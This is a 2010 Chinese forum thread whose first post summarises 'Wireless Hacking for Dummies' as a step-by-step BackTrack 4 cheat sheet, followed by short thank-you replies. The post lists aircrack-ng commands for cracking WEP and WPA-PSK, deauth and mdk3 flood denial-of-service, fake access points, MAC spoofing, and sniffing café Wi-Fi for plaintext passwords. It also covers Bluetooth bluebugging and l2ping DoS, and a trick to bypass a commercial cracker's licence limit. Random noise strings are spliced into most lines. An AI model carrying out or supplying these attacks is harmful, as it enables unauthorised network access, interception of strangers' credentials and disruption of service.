搜索
格西欧解决方案
如意云路由器
查看: 8594|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3701

积分

少校

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。6 d  K8 Y1 i- f- K+ x
! B! z6 d, a$ j  ?4 B
以下所有操作均在BackTrack 4中进行。+ [, F8 E8 R9 U2 Y

4 \2 [1 K- ?; K8 G2 M
$ \+ ?2 }  }$ `  s" `无线WEP加密P解:
8 s$ a- A0 i) ^  {( H% ?7 W* F. T7 Y  N  Q# b- G' m  s
注入P解:
, q2 P8 x: C2 n# ~1 }% U4 u4 z- A& g3 A. i% b9 B% c* H
ifconfig
" o3 U  [7 Z3 @- G7 m9 |: S* U0 i- |
ifconfig –a
6 t. z8 C2 L! l% u/ r! ?' y, F6 m7 S2 h% r
ifconfig wlan0(无线网卡) up
' m1 y' e" y' i! q
: w" G0 ?( |: |1 kairmon-ng start wlan05 y0 _* s$ i: I( @6 s
0 U3 v: y6 H* G" x
airodump-ng mon0# X/ B  C& J' v6 o
8 h! }' F3 m0 ?& X# Y- ]
airodump-ng --ivs –w ivsfile –c 频道 mon0或! ^, R0 y) J) h4 C# m/ j  `/ @

+ k6 B" k0 I: K0 w( l8 wairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
* a% ^" ?9 q8 t5 J! c+ Z. g* {4 X+ [3 f9 h6 C! `
aireplay-ng -3 –b BSSID –h Station mon01 F& y( d8 B: t
3 W/ j- F2 Q9 u) @$ o
aircrack-ng ivsfile-01.ivs; D. r& x2 t5 {; p# |2 x. L9 v
4 k( @8 P* e: e( r, n% ]; Y/ K" g
虚连接P解(适用于无客户端连接APP解)
, }3 z( L8 J" y! |$ r/ d! J
1 o5 b" m7 V' W8 ~/ Xifconfig
) a% E' @! h5 l) F. N2 h, j
; y. X1 H. d" sifconfig –a
; ?7 {5 M* D% c! l
5 r3 G. e: Y. o- l- U- Gifconfig wlan0(无线网卡) up
# X) `" r2 q4 V# a" _( c0 m! s: s0 T( J; Y
airmon-ng start wlan0
6 {# i% U( M0 y" m5 E- J  _% ^5 b+ p/ C
airodump-ng mon0
& R8 D. W% y% t
5 J( @0 N4 [4 S5 ]airodump-ng --ivs –w ivsfile –c 频道 mon0或
; n2 h5 a6 U1 q0 k. h) H* Z  c# |7 U9 h/ T& W
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
  v% X' w1 p- t; p4 X2 V) b+ E& G0 M- R' a9 |
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon05 Z1 N3 D0 t8 _* I% @/ Q
6 K0 ^5 I: ?* a4 {) T8 v# A
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon06 n7 ^- a( K( T, O$ y' ~
% d/ y6 c& Z8 D/ ?
aircrack-ng ivsfile-01.ivs! H: k# l$ O; R
5 E/ S) i- b# k
* A7 T$ s, j  M( {
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。7 X) b. a9 v  [' [
' [4 U- j% n5 `; X. l

, V' [: n2 g7 yWPA-PSKP解& o/ L8 {- Q: f" f# q

( ?% `3 k6 V# z; A) Pifconfig
* b" Q2 V% A% j  r$ N9 j/ K% G9 e8 `- v8 @9 K
ifconfig –a  ^, L  ^7 O5 H9 P  M- G2 a

5 d7 p; Z7 ?6 V* Hifconfig wlan0(无线网卡) up
- w# S( v  s. J/ i" X' u% A3 c: Y
) d1 N" u( q( X' X. K7 o- wairmon-ng start wlan0
, K1 ^) [% q! M% U0 z. T  p% L
6 J9 k% f5 t, h( F# C2 _, Eairodump-ng mon0' r0 G+ A! N! `2 _

7 M' C/ X+ j9 _5 }( J* {airodump-ng –w capfile –c 频道 mon0
& ?  N6 o! {& r; E' J# U6 b" j* O
, y$ h, a8 {: x5 baireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
8 H3 a+ O+ x  B( t& ?
/ `. `/ C3 P+ I+ N( _. K  saircrack-ng –w Dic capfile-01.cap或* Y- U; G  `& a. s8 _2 u8 F# f

2 ]9 i+ q5 {# w6 I# Ncowpatty –f Dic –r capfile-01.cap –s SSID- Y& d: M, Q5 P! f

6 @; a1 s$ B; E( ?! x5 Zcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID" J9 {# d, e" p9 D
% R! P# }3 e% m7 I. w; X
傻瓜式P解软件SpoonWPA。& N6 M! y- l, G/ h! q3 L/ a  u
' K5 K+ s4 y$ }
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst3 X1 U9 t! W1 U

& G8 V; I& D/ K
3 R9 X5 i% e) e, v' f字典文件的生成和上传. w2 [8 n7 i) t7 D+ X6 }, N, X
( }2 J8 X. |+ t" X/ {! B
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
$ w; R. d. z% w7 j
& b8 s" e  Y+ r. s5 p
& T% u/ o: s) cBT4下开启Tftp:Services—TFTPD—start TFTPD
. J2 \7 |/ @( Z0 ?( E; M/ z+ T, n$ d; X6 C
在Windows的CMD中运行 tftp –i IP put **.dic
5 w! D' y1 |- G; P' b
: F; w4 k0 @0 @- A. W( o+ ^. C
$ ?5 ^+ g* f0 ]. C; x8 O- XBT4下开启SSH:Services—SSH—start SSH
2 _& [; R- B! O8 q9 _' s% h5 K
. D2 U* s9 Y' I' L* wWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root8 D3 F0 D/ L# u* F* I5 |

% m0 I9 H: O/ D9 O; Y' R) ~2 T9 D, i* @
AP限制MAC时的解决
/ s1 `4 S, v' r4 C" @3 u! [) R& k
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
% p/ |. S% Y! E
4 s, f  o5 Y( k  o! w/ R8 wifconfig wlan0 hw ether NewMAC% C$ {. A/ S: d

9 _: n6 z: W- x4 l( O
4 x' v& R5 j* Q8 }* Q$ o. ^关闭SSID广播的AP探测:
3 Y! p2 T* I: L7 M
/ x  }4 |1 r* q, I2 j1.     Deauth攻击:4 w, f4 F8 q& r: |5 j! y2 R2 S. C
' h, g. k0 ~- y' u7 f
airodump-ng mon0
: Z2 L2 M) f" S, d. M2 z
4 M% |5 \8 Z+ R$ I: Yaireplay-ng -0 10 –a BSSID –h Station mon09 R% A! L, s- u  |
% \, r% H" x; ^1 j( }) i, o0 b
2.     抓包分析& g4 ]* L$ c: V  g4 u

" [$ p4 }& a! jOmnipeek
# _- D& Z3 K( w# S! i# {6 W! |6 ]; \; }* E
Tcpdump –n –e –vvv –i 网卡名
- Q1 x9 z; g. c1 U. ?# A0 ~$ a7 M
  |+ M8 H1 v! X5 [4 F, |* \6 _( k6 e3.     暴力P解* {; @( F& _4 h" r2 H0 y
( L2 N- |* ?, B" c$ u' m
Charon 1.1暴力P解
- ?  K7 u( c& f, P. O% k5 Y% w" }6 G% [
( a! N% n8 a# M& {8 K2 n1 z
无线加密数据包的解密# o( n3 b' N0 |2 ~7 P/ }) O! Q
. r8 i/ S2 k, M
: X$ I: Z" j1 w3 f+ c: s# \' v
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。4 k# V" v1 t1 Y) ~/ L! {4 e  h

4 v$ C: [2 f, x; HFilterNS     DNS解析数据包
* r! m! p! L: Y8 r9 P. g1 R8 N* e& W
Filter:HTTP    WEB访问数据包( t. ]0 t* K% u" m' f% i( X& _
! G/ u4 |! j$ p1 ]+ q0 ]* Z7 T( {
Filter:msnms   MSN
* j. d7 ?+ U* L( W; W% m0 H6 J" l- L7 B$ ^
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。( W1 N4 U3 N% \/ f6 n

* C  E4 q, `" g, l+ ]. P5 J# f使用airdecap-ng解密:$ D: c5 U. l! \- ?% e

  A" {/ v/ ^0 D" c7 Y( rAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap& m( {  E" U. [) m3 e1 E* z

2 H' S2 z2 i+ a# X0 s/ z' p4 f; ?* A! ~5 w
咖啡馆中无线数据截取(开放式无加密AP)
5 ^  F2 S( d+ a' `2 t* o; }: q4 ^3 @) f5 D- }. h% X$ }& y
1.Airodump-ng –w data –c频道 mon0  s0 N% `  h, ], D
' @5 I3 {; m7 U9 k
2.使用WireShark打开分析7 D3 f* ~& d- J6 Q1 ?

9 n" i. u3 |! a- Y! R+ [' o) G9 s6 e+ A9 e$ S4 q6 M1 Z
BT4下的渗透工具:
7 p; |  |% p7 X
" m5 Y1 e. \  g0 ]5 snmap –sP IP/24        判断C段下存活的主机
& C! X% O4 L/ B7 m5 `
3 o2 O% `: y2 W: Jnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放1 B6 v) P; t; i  q+ Y& W
2 L7 I$ M  N0 u  n
nmap –vv –sV IP –p port   指定端口的详细信息。。。
- j2 l( I( S8 M, [- D
: n2 H- @3 ^' \  tnamp –O IP/24    判断主机的系统版本0 ~0 d9 r3 R) v! C% p& U( d2 [( @

$ X( k- q7 A# `4 h( Y9 _6 m& P+ K- K; o. N
GUI 版nmap:Zenmap
, D& K" s  M3 v- _4 n7 V
& k" ?  B) r- [- K: A% S5 E9 E4 S3 R2 E6 N
Amap使用:amap –B IP port& {3 M+ P" Q7 k% n: A1 A- }
- b- ^9 ]0 V* r
Nbtscan(扫描Windows网络NetBios信息):3 @2 a9 B3 R  `4 O0 g6 R2 U* j

. a2 [, Z* p3 p6 ?" @) onbtscan –v –s : IP/24! U" }) }4 W# V& a* j

/ I" K/ X' Y, Z2 B' }, m0 |* z+ F$ ^/ \" pnbtscan –r IP# N- x, }4 N3 S4 i

, c/ f' A6 o9 k' t. l. @/ f: k1 F5 X' C. X! q
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.6 \. p; _+ W; w4 S

; Q$ I% M! U6 t& y9 q* L; k2 d  G  B$ ~6 F: ?/ h7 S1 a
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)# A, ~+ v& @% x! U1 G2 p- c! u
: E& e4 H6 Y6 G- Z9 z$ \4 H6 V
BruteSSH: ./bruthe.py –h IP –u Username –d Dic; n3 D8 u, o- ~9 Z3 r- c

, A/ x, `, k2 rMetasploit3使用) x- C; `, u& ^& \! p
无线D.0.S+ D" n5 G. G4 c! [( F+ ~, @& V7 b
, f' b' X/ n4 F3 I: ^! J/ B# m3 n
$ J6 _' \3 ~+ @7 G5 R3 I
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
2 q, U6 u1 Z# k$ J) T8 k! \4 j3 a, h9 u7 \  S6 F1 [1 P
airmon-ng start wlan0
# q7 Q' R- u* ?1 c
9 D4 J3 T! O" R+ z% ~& ~airodump-ng mon0% C' Q. B/ L  E9 I% f$ Y# \6 Q
* V3 ?2 w% T& H$ `* ]5 n
mdk3 mon0 a –a BSSID* K7 P; T4 V$ D1 B: u; f

# \$ q+ M$ T0 s4 I  l2 w对所有的AP攻击:mdk3 mon0 a' D& L" \0 k0 `7 e8 \

, _7 i/ i! B& m; w) k/ D7 @1 V$ v5 l$ T( b& ~$ ~1 I
Deauth Flood 攻击0 L. Z9 x6 l; s, j' R- M, C

7 O8 E  B- h: a6 A1 [4 B% `mdk3 mon0 d –c Channel
6 s( r6 E+ K: r3 `7 w$ K# c# Z7 ?: s$ \; w
图形化D.O.S攻击:Charon: C+ C7 i1 F. Q( R( F8 Q$ y
: F1 s* i7 i0 A% V4 X+ P

* Z! U& r* w& E$ Q0 z当受到攻击时,使用Wireshark抓包可以看到异常信息。
; I& E! S% p( A/ H( `$ Q" V2 A: ~1 X" ^5 e$ |7 y; m6 Y
/ }+ s. k; b; v" B! K' I0 u0 L/ r$ I
WPA-PSK高速P解
, x  d' i/ \# g( T4 P3 X
5 N3 \0 n3 O' j/ s1.       WPA-PSK PMK Hash TablesP解" @. ^2 w. m7 k  O' S, C
' y5 x! l, S* }; e. x6 G
Cowpatty –d HashTable.hash –r ***.cap –s SSID' X# b& B$ Y: J, E

; \! K- T. i" y/ N+ q$ U3 QHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
3 ?. R# y( M, y  K4 W8 K/ O0 T) z. G
2.       GPU辅助高速P解
$ z/ z# h: P- P/ F: z' T6 x
/ A( J. F, L& y+ I使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。5 w/ ]" z8 Q! E% T3 w* {/ N* }
) i# g3 C( }+ J1 s0 B" v
3.       分布式P解5 g: i( s9 B( a. v

" O# r  f7 j' \! {( i
1 B4 _% y; Z1 G* F8 o3 z. hAP的伪造, B- u& q2 h6 H* y: Z" j, J

: g+ n4 H8 U* z把AP的MAC改成目标AP的MAC
3 c( q8 v2 e% P
" o* r& J2 `) t) S7 O网卡软AP9 ^. M( ]1 U# p& ?

) f0 k( ?9 I% x8 J- `
  }* |% ?) b8 j5 U伪造大量虚假AP信号:
1 p! h/ x' W( ]4 n% Y5 Q
- N0 q$ S6 M. l( F- G1 s: D5 p  i随机SSID:mdk3 mon0 b –g –c 频道 , `+ u. u, J3 L" ^8 ]

) l$ \' a( W* S; K4 i$ s* Y指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
( X! M( {1 L' c9 n( I" D- I6 X
  ?# s  [% |' ]0 I4 J$ [) V7 y
) Z( `$ E5 B, s. W$ l% cWar-Driving6 A5 s- M( g: E# F2 f

! [7 t0 P; r6 I8 n热点地图绘制
% d& O- p& P  P3 X! g+ S- Y& D3 l* O: H
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。! a# t4 n) `/ l+ i3 t

. j. e8 v( ^4 u' o7 V* |* S% W
+ x7 W7 t& h9 C: g' |# b# j# SNetstumble  N/ D7 F$ d: X& }4 b( z

* A& ^1 H) |2 o5 c! R  H- k, T+ g- K5 F  [
蓝牙Hacking
+ A1 v- m& z- s+ B; a4 r9 N3 O2 ]  h9 {; C
Windows下的Blue Soleil工具
% |% K4 K) Q8 @+ u$ n
. p/ M4 Z/ [5 EBT4:9 J) A  P7 H2 k: e. C. m- T8 E' v

) z- q3 A0 A; ~) j( ?+ i2 H9 {hciconfig 查看蓝牙适配器8 ~4 K5 X/ W" P2 N1 N! {& y
, S+ I5 Y5 {* y' ?8 e
hciconfig hci0 up 载入蓝牙适配器+ Z3 h, q- Q+ c2 U& o

' b! i6 w$ f3 ~2 o5 ^% Nhciconfig hci0 class 蓝牙适配器详细信息
& U  I9 |5 Z2 `# F( b( I: e6 t
" \4 W$ K7 F' Y8 Y8 U, W$ ~% X6 p0 b! |- Z
hcitool(扫描蓝牙)
# m/ m! y5 g1 f' k/ V6 s6 Y+ X
" s, v, e& E% R. Z5 f# L2 }hcitool –i hci0 scan" Y& S) \$ z7 p

2 S; Z- K8 X1 ^2 cBTscanner(扫描蓝牙)
7 ]6 z  e6 O# L$ `4 q- @$ q! {7 t% {2 z: v* C% y% J
4 D3 J2 S6 }2 j: w* z& S& \" q
蓝牙攻击:
4 `0 Z1 E0 E" P' Q9 I
5 @$ R4 \- ~* H1 D3 tBlueBugging (适用于BlueTooth V1.1的手机)' l/ ^5 s0 r& n# y) K

+ T% W% y4 n3 u1 ~: O* P- uBluebugger工具:! }% J5 S; D% W) J# e% e7 ~
9 A0 v* y, x; i, C" o" W6 Z! M" t
Bulebugger –a HD_Addr info4 p6 M, c/ _& Q% K- E' z
  E1 k8 Z$ N+ r' C

; X  J8 H& R' L/ [1 t, rBlueJacking8 {, i6 {  t1 a- N- m# N3 p8 s

4 t) J2 |  N' |' [" T实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
5 f! @( e/ q# i8 r7 @! W; ^0 u! S1 q9 T9 f4 p- B: q+ a
% h. I  \; x6 u/ ?9 W* A+ T7 c$ G
HD_Addr修改:7 r# y( A' X) V8 W& [
( m4 |7 u4 k# X9 C5 Z8 c
Bdaddr工具7 {; \" w  ~$ I8 ?: B% P$ P; I

- F6 E9 ]5 [8 J4 k# lbdaddr –i 蓝牙设备名 新HD_addr
5 a; W3 t5 `8 b# z) p( Y+ G4 `9 k; }# B( \/ Z

9 A8 J# @) J9 M- e% A" D0 U蓝牙D.O.S4 R% X$ f2 K. ?2 G5 ]

( {- H! l' Q; p. J  [l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
/ J3 @9 q  y5 `4 f$ \7 l: h2 A( {# W" z, M1 E" a5 Q1 [
hciconfig
7 f; Z! s; S) K- c6 m% b+ m$ V( L. v$ Y# [! p  U( m
hciconfig hci0 up
6 X! p; b3 ]( j( I8 O. E
  Y5 g) l3 ~6 y% S  {, r( Nhcitool –i hci0 scan3 j4 j) ]/ h( A6 _0 s
7 `  g  ?% `( I/ a
l2ping –s 10000 –目标MAC: N6 S, T2 ?8 e& g/ y
7 x5 j0 G" j1 _3 }% F, o/ t, ~

3 q; v# b5 {3 ?$ _0 {# S, t7 K0 p不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)/ ~2 d" M" I$ i8 `7 F' p
6 M3 o/ X+ G+ i5 D
./fang –r ************-############ -s
" s7 O3 Z6 [  C6 V/ v- h/ U  F& M) }6 F3 Z5 i' B: V4 N
暴力P解************-############的蓝牙设备( b' T# n; }+ ~4 ^
: K# b7 E. ?. a: F, i- {
./fang –l 各厂商BD_Addr分配
5 Q+ T9 _/ |* X& e7 {* k1 \  `6 z% g0 _0 E# l2 R/ L2 Y
4 m6 s, L$ s! ^9 G( w
WifiZoo使用$ V7 T9 h- v3 N1 e
! A$ |/ F; j/ R) g0 d
./wifizoo.py –c Capfile# k; n! f' A4 x' f8 Y, f

, e" r" m$ e2 e# j访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1128

积分

上尉

该用户从未签到

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

251

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

679

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
$ Z- c) s9 V3 B借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的! L/ \( N5 E4 x  x! Z
呵呵 其实也不贵 21块 快递再一点
, ^2 s* Y  J2 l我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 成为会员

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )     免责声明

GMT+8, 2014-8-21 00:32 , Processed in 0.135718 second(s), 9 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表